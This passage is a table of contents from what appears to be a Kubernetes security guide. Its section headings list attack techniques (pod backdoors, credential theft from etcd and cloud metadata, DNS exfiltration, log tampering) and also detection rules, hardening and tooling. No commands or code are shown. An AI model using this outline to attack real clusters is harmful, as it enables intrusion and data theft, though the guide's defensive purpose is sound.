  • 5.4 Cloud Metadata from Pods
  • 5.5 CoreDNS Poisoning
  • 5.6 ARP Spoofing from hostNetwork Pod
  • 5.7 Kubelet API for Cross-Pod Execution
  • 6. Persistence
  • 6.1 Admission Webhook Backdoors
  • 6.2 CronJob Persistence
  • 6.3 Static Pod Injection
  • 6.4 DaemonSet Backdoor
  • 6.5 Mutating Webhook for Persistent Injection
  • 6.6 Container Image Backdoor
  • 6.7 Shadow API Server
  • 7. Credential Access
  • 7.1 Secrets via Kubernetes API
  • 7.2 Secrets in etcd
  • 7.3 Mounted Secrets in Pods
  • 7.4 Cloud IMDS Credential Theft
  • 7.5 IRSA / Workload Identity Abuse
  • 7.6 Container Image Layer Secrets
  • 8. Data Exfiltration
  • 8.1 Volume Mount Access
  • 8.2 Sidecar Injection for Data Capture
  • 8.3 DNS Exfiltration
  • 8.4 Container Registry Theft
  • 8.5 HTTP/HTTPS Exfiltration via Egress
  • 9. Defense Evasion
  • 9.1 Pod Security Bypass
  • 9.2 Admission Controller Evasion
  • 9.3 Log Tampering and Event Deletion
  • 9.4 Pod/Container Name Similarity
  • 9.5 Rootless Container Escape Techniques
  • 9.6 Image Build-Time Evasion
  • 10. Detection Engineering
  • 10.1 Falco Rules for Kubernetes Attacks
  • 10.2 Sigma Rules for API Audit Logs
  • 10.3 API Audit Log Policy
  • 10.4 OPA/Gatekeeper Policies
  • 10.5 Kyverno Policies
  • 10.6 Runtime Monitoring with Tetragon
  • 11. Hardening
  • 11.1 Pod Security Standards (PSS)
  • 11.2 Network Policies
  • 11.3 RBAC Least Privilege
  • 11.4 Secrets Management with external-secrets
  • 11.5 Control Plane Hardening Checklist
  • 11.6 Image Security
  • 12. Offensive and Defensive Tooling
  • 12.1 Offensive Tools
  • 12.2 Defensive Tools
  • 13. Cloud-Specific Kubernetes Attacks
  • 13.1 AWS EKS -- IRSA Abuse
  • 13.2 GCP GKE -- Workload Identity Abuse
  • 13.3 Azure AKS -- AAD Integration Attacks
  • 13.4 Cloud-Agnostic Mitigations
  • Quick Reference: Attack Path Summary